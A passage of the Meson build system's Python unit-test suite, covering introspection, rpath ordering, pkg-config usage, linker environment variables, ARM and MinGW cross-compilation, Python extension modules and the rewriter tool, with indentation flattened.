for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
